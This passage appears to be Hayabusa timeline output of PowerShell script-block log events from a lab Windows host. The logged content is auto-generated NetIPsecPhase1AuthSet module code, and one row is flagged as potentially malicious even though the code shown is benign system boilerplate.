-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 
'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' -Alias '*' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' -Alias '*' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/stand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 